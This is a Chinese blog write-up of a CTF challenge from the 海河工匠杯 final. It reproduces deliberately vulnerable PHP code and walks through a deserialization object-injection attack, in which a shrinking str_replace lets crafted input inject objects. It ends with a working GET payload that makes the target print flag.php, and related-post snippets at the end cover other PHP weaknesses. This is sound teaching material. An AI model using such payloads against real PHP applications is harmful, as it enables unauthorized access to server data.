海河工匠杯决赛

最新推荐文章于 2022-10-07 12:40:32 发布
最新推荐文章于 2022-10-07 12:40:32 发布
阅读量871 收藏 4
点赞数 1
分类专栏: CTF赛题复现 文章标签: PHP反序列化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46918279/article/details/121205542
版权

一道字符串减少的反序列化题目,以前没有遇到过,结果在这里被制裁了,复现一下。增加姿势

注意吞掉这个词

题目


<?php @include 'common_ui.inc';?>
<?php
class Low{
    public $user1;
    public $user2;
    function __construct($a, $b){
        $this->user1 = $a;
        $this->user2 = $b;
    }
}

class Mid{
    public $mid;
    function __destruct(){
        $high = 'nice,'.$this->mid;
        echo $high;
    }
}

class High{
    public $high;
    function __toString(){
        //flag.php
        include "flag.php";
        if($this->high=='flag.php')
        {
            echo $flag;
            echo "<br/>";
        }
        return 'good job';
    }
}
if(isset($_GET['a'])&&isset($_GET['b']))
{
    $a = new Low($_GET['a'],$_GET['b']);
    $b = unserialize(str_replace('******', chr(0) . '$' , serialize($a)));
    echo "<br>";
}
else
{
    highlight_file("./test0.php");
}

?>

分析

可以发现,我们要想得到flag,靠的是High类的__toString()方法

class High{
    public $high;
    function __toString(){
        //flag.php
        include "flag.php";
        if($this->high=='flag.php')
        {
            echo $flag;
            echo "<br/>";
        }
        return 'good job';
    }
}

只要我们将$this->high变量在反序列化的时候赋值成flag.php时即可输出flag了。

要想调用__toString()方法,就得找到一个能将类High输出的地方。发现在这个地方

class Mid{
    public $mid;
    function __destruct(){
        $high = 'nice,'.$this->mid;
        echo $high;
    }
}

当我们把$this->mid在反序列化的时候赋值为new High()即可。

总体思路就这么简单,我们回到代码开始的地方

if(isset($_GET['a'])&&isset($_GET['b']))
{
    $a = new Low($_GET['a'],$_GET['b']);
    $b = unserialize(str_replace('******', chr(0) . '$' , serialize($a)));
    echo "<br>";
}
else
{
    highlight_file("./test0.php");
}

题目要求我们GET输入a和b的值,作为实例化Low这个对象的参数。

<?php
class Low{
    public $user1;
    public $user2;
    function __construct($a, $b){
        $this->user1 = $a;
        $this->user2 = $b;
    }
}

即赋值给user1和user2。

第二步在反序列化的时候会对序列化之后的字符串进行处理,将'******'替换为chr(0).'$'。注意

这里chr(0).'$'是两个字符,只是chr(0)不可见。

首先看看我们序列化字符串的样式

<?php
class Low{
    public $user1;
    public $user2;
    function __construct($a,$b){
        $this->user1 = $a;
        $this->user2 = $b;
    }
}

class Mid{
    public $mid;
    function __construct(){
        $this->mid=new High();
    }
}

class High{
    public $high;
    public function __construct(){
        $this->high='flag.php';
    }
}

if(isset($_GET['a'])&&isset($_GET['b']))
{
    $a = new Low($_GET['a'],$_GET['b']);
    echo serialize($a);
}
else
{
    highlight_file("./test0.php");
}

结果:

O:3:"Low":2:{s:5:"user1";s:9:"new Mid()";s:5:"user2";s:10:"new High()";}

可以看到,因为我们是通过$_GET输入的,所以输入的数据为字符串类型。我们能够控制的地方就是new Mid()和new High()两处。

而我们想要的序列化结果为:

这里因为是前面吞掉后面的字符,所以是将user2赋值为new Mid()

<?php
class Low{
    public $user1;
    public $user2;
    function __construct(){
        $this->user1 = 'xxx';
        $this->user2 = new Mid();
    }
}

class Mid{
    public $mid;
    function __construct(){
        $this->mid=new High();
    }
}

class High{
    public $high;
    public function __construct(){
        $this->high='flag.php';
    }
}

if(isset($_GET['a'])&&isset($_GET['b']))
{
    $a = new Low($_GET['a'],$_GET['b']);
    echo serialize($a);
}
else
{
    highlight_file("./test0.php");
}

结果:

O:3:"Low":2:{s:5:"user1";s:3:"xxx";s:5:"user2";O:3:"Mid":1:{s:3:"mid";O:4:"High":1:{s:4:"high";s:8:"flag.php";}}}

可以看到,我们将user2其中一个赋值为类Mid

即(重要代码,后面会用到)

s:5:"user2";O:3:"Mid":1:{s:3:"mid";O:4:"High":1:{s:4:"high";s:8:"flag.php";}}}

那么就可以通过Mid的__construct()方法实例化类High,然后调用High的__destruct()方法,成功得到flag。

注意:前面为字符串,后面为对象时是有个分号;分开的。即s:3:"xxx"与s:5:"user2";O:3:"Mid":1:{s:3:"mid";O:4:"High":1:{s:4:"high";s:8:"flag.php";}}}之间有个分号隔开的,所以待会处理的时候要注意

但是因为我们传入的数据会被作为字符串处理,没法直接传入上述数据。

<?php
class Low{
    public $user1;
    public $user2;
    function __construct($a,$b){
        $this->user1 = $a;
        $this->user2 = $b;
    }
}

class Mid{
    public $mid;
    function __construct(){
        $this->mid=new High();
    }
}

class High{
    public $high;
    public function __construct(){
        $this->high='flag.php';
    }
}

if(isset($_GET['a'])&&isset($_GET['b']))
{
    $a = new Low($_GET['a'],$_GET['b']);
    echo serialize($a);
}
else
{
    highlight_file("./test0.php");
}

 注意:因为前面说了两者之间有个;隔开,所以在给b传值时候需要在重要代码前加一个;

结果:

O:3:"Low":2:{s:5:"user1";s:3:"xxx";s:5:"user2";s:79:";s:5:"user2";O:3:"Mid":1:{s:3:"mid";O:4:"High":1:{s:4:"high";s:8:"flag.php";}}}";}

可以看见,传入的数据都作为字符串扩起来了

那么应该怎么做呢?吞掉

可以看见在反序列化之后还有一个字符串替换函数

str_replace('******', chr(0) . '$' , serialize($a))

这串代码,表示每6个*会替换成两个字符。那么就会吞掉后面4个字符

如果我们对a传入n个*,user1的结果就会变成

O:3:"Low":2:{s:5:"user1";s:n:"n个*";s:5:"user2";s:79:";s:5:"user2";O:3:"Mid":1:{s:3:"mid";O:4:"High":1:{s:4:"high";s:8:"flag.php";}}}";}

经过替换后,*的个数少于n,那么就会继续吞掉后面的字符,当到达一个程度后,会把后面的

";s:5:"user2";s:79:
//19个字符

19个字符全部吞掉,后面的一个"与前面的一个"形成闭合。剩下

;s:5:"user2";O:3:"Mid":1:{s:3:"mid";O:4:"High":1:{s:4:"high";s:8:"flag.php";}}}";}

这样user2的结果就是一个Mid类了。

如何算需要多少个*呢?

我们这样想,每6个*替换成2两个字符,就会吞掉4个字符,总共需要吞掉19个字符,但是19除4是除不尽的,所以我们还要在给b传值时候在多加一个字符;因为需要再吞一个字符就会把后面的" 吞掉,为了闭合,我们多加一个" (以后推荐要多加字符的时候,全部用")

那么现在就需要吞掉20个字符了,每6个*替换成2两个字符,吞掉4个字符。6个*为一组,一组能吞掉4个字符,需要20➗4=5组,所以我们需要(20➗4)✖️6=5✖️6=30个*

payload:

GET:
?a=******************************&b=";s:5:"user2";O:3:"Mid":1:{s:3:"mid";O:4:"High":1:{s:4:"high";s:8:"flag.php";}}}";}

我们加上字符串替换函数看看:

<?php
class Low{
    public $user1;
    public $user2;
    function __construct($a,$b){
        $this->user1 = $a;
        $this->user2 = $b;
    }
}

class Mid{
    public $mid;
    function __construct(){
        $this->mid=new High();
    }
}

class High{
    public $high;
    public function __construct(){
        $this->high='flag.php';
    }
}

if(isset($_GET['a'])&&isset($_GET['b']))
{
    $a = new Low($_GET['a'],$_GET['b']);
    $b = unserialize(str_replace('******', chr(0) . '$' , serialize($a)));
    var_dump($b);
}
else
{
    highlight_file("./test0.php");
}

?>

传值:

GET:
?a=******************************&b=";s:5:"user2";O:3:"Mid":1:{s:3:"mid";O:4:"High":1:{s:4:"high";s:8:"flag.php";}}}";}

结果:

 

 成功将user2污染为Mid()类对象。

payload:

GET:
?a=******************************&b=";s:5:"user2";O:3:"Mid":1:{s:3:"mid";O:4:"High":1:{s:4:"high";s:8:"flag.php";}}}";}

结果:

_Monica_
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
工匠-CTF(题目+exp+解题思路)
04-01
CTF竞赛模式具体分为以下三类: 一、解题模式(Jeopardy) 在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程...资源包括工匠比赛的三道题目和exp,并详细写出了解题思路。
ctf--php
weixin_34060299的博客
06-25 276
1.if(eregi("hackerDJ",$_GET[id])) { //eregi字符串对比 echo("<p>not allowed!</p>"); exit(); 2.isset 判断变量是否定义过 3.比较符 $a==$b 松散比较 === 完全等于 = 大于等于 != 如果类型转换后...
CTF
ztaos的博客
12-12 535
http://120.26.93.115:18476/eff52083c4d43ad45cc8d6cd17ba13a1/index.php if (isset($_GET['a']) and isset($_GET['b'])) { if ($_GET['a'] != $_GET['b']) if (md5($_GET['a']) === md5($_GET['b']))
PHP中MD5函数漏洞
05-07 705
题目描述 一个网页,不妨设URL为http://haha.com,打开之后是这样的 if (isset($_GET['a']) and isset($_GET['b'])) { if ($_GET['a'] != $_GET['b']) { if (md5($_GET['a']) === md5($_GET['b'])) { echo ('...
PHP弱类型导致的安全问题--md5
LANVNAL的博客
01-30 2909
bypass again 200地址:依旧是弱类型来源 hctfif (isset($_GET['a']) and isset($_GET['b'])) { if ($_GET['a'] != $_GET['b']) if (md5($_GET['a']) === md5($_GET['b'])) die('Flag: '.$flag); else print 'Wrong.'; }代码可以看出要
网络安全笔记-99-渗透-PHP代码注入
wwxxee
01-21 584
PHP代码注入 原理及成因 是指应用程序(web方面)过滤不严格,用户可以通过请求将代码注入到应用中执行。代码注入类似于SQL注入漏洞,SQLi是将SQL语句注入到数据库中,而代码执行则是可以把代码注入到应用中最终由服务器运行它。这样的漏洞如果没有特殊的过滤,相当于直接由一个web后门的存在。 漏洞危害 代码执行漏洞可以继承web用户权限,执行任意代码。如果服务器没有正确配置,web用户权限比较高,则可以读写目标服务器任意文件内容,甚至控制整个网站以及服务器。PHP中有很多函数和语句都会造成PHP代码执行漏
海河流域矢量
09-10
海河流域矢量,shpfile格式,可用于各种地理信息软件。
天津结构海河汇报材料(PPT).pdf
10-11
天津结构海河汇报材料(PPT).pdf
全国水系kmz数据-海河流域
06-03
海河流域的kmz数据,包括干流、支流,涵盖流域内的所有河流,各河流均有属性,不像好多shp水系数据只有流线而没有属性名称
论文研究 - 2005-2017年海河流域水质趋势分析
05-24
海河是中国七大河流之一。 海河流域水污染问题严重。 海河流域的水质一般在北部最好,在南部最差。 其中the河水质最好,I-III比例约60%,图海马家河水质最差,> V比例超过60%。 从水质变化趋势看,山东省在图海...
CTF平台题库writeup(一)--南邮CTF-WEB(部分)
渗透、攻防、CTF、编程
06-25 1万+
WEB题 1.签到题 题目:key在哪里? writeup:查看源代码即可获得flag! 2.md5 collision 题目: <?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51 == $md52) { echo "nctf{*****************}"; } else {
php实现弱类型,PHP弱类型详解
weixin_35763513的博客
03-10 385
最近做ctf题目会经常碰到PHP弱类型的题目,本文主要和大家分享PHP弱类型总结,希望能帮助到大家。知识介绍:php中有两种比较的符号 == 与 ===1 、观察上述代码,"admin"==0 比较的时候,会将admin转化成数值,强制转化,由于admin是字符串,转化的结果是0自然和0相等。2 、"1admin"==1 比较的时候会将1admin转化成数值,结果为1,而“admin1“==1 却...
2020-09-03签到赛
Kihyun_的博客
09-03 245
super_easy_web1P1P依旧开心哈哈哈Very_Ez_Unserialize super_easy_web <?php highlight_file('index.php'); include('flag.php'); //try to reach the flag in variable if(isset($_GET['a'])&&isset($_GET['b'])&&isset($_GET['c'])&&isset($_GET['d'].
南京邮电大学2021年CTF
戴夫特
03-15 941
web登入页面1 <?php if($_POST[user] && $_POST[pass]) { mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS); mysql_select_db(SAE_MYSQL_DB); $user = trim($_POST[user]); $pass = md5(trim($_POST[pass])); $sql
攻防世界 Web simple_php 简单php弱类型题
Rashu99's blog
06-11 657
$ a=@$_GET[‘a’]; 中的@是为了防止没有 $_GET[‘a’]出现错误提示. 一般都用 isset() 来判断一下 $a = isset($_GET['a']) ? $_GET['a'] : null ; 预定义的 $_GET 变量用于收集来自 method=“get” 的表单中的值。 从带有 GET 方法的表单发送的信息,对任何人都是可见的(会显示在浏览器的地址栏),并且对发送信息的量也有限制。 is_numeric() 函数用于检测变量是否为数字或数字字符串。 php弱类型比较 = .
php危险函数总结
我是齐潇啊
03-28 5454
php危险函数笔记总结以及实操结果
南邮 CTF平台部分 write up
qq_42863361的博客
08-02 1883
南邮 CTF部分 write up web md5 collision 看源代码
php语言特性
weixin_63231007的博客
04-15 1916
<1>弱类型比较 我们来看下面一道题: if($_GET['a']!=$_GET['b'] && md5($_GET['a'])==md5($_GET['b'])){ ehco flag; } 如何才能满足这样的if判断条件呢?需要使两个变量不相等而md5值相等。这样的思路可以通过MD5碰撞来解决。让我们思路回到php语言,==存在弱类型比较,而md5函数返回值是一个32位的字符串,如果字符串以"0e"开头的话,类型转换机制会将它识别为一个科学计数法表
PHP安全相关知识
热门推荐
wanan的博客
10-07 1万+
PHP安全相关知识
海河流域 kmz kml
最新发布
10-06
海河流域是中国北方的一个重要河流流域,位于河北、山西、内蒙古、北京和天津等地。KMZ和KML是谷歌地球软件中的文件格式,可以用于表示地理信息数据。 KMZ是一种压缩格式,可以将多个地理信息数据文件压缩成一个文件,方便在谷歌地球软件中使用。在海河流域中,我们可以使用KMZ文件来表示这个地区的地理信息数据,包括河流、湖泊、城市、道路、边界等等。通过打开这个KMZ文件,我们可以在谷歌地球中浏览和查看这些地理信息数据,了解海河流域的地理特征和分布情况。 KML是一种标记语言,可以用来描述地理信息数据的结构和属性。在海河流域中,我们可以使用KML文件来定义和表示这个地区的地理信息数据,例如使用标记来表示各个城市的位置、河流的路径、湖泊的面积等等。通过打开这个KML文件,我们可以在谷歌地球中显示和编辑这些地理信息数据,以便更好地了解和管理海河流域的地理特征。 综上所述,KMZ和KML可以用于表示和管理海河流域的地理信息数据,在谷歌地球软件中使用这些文件可以帮助我们更好地了解和研究这个地区的地理特征和分布情况。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值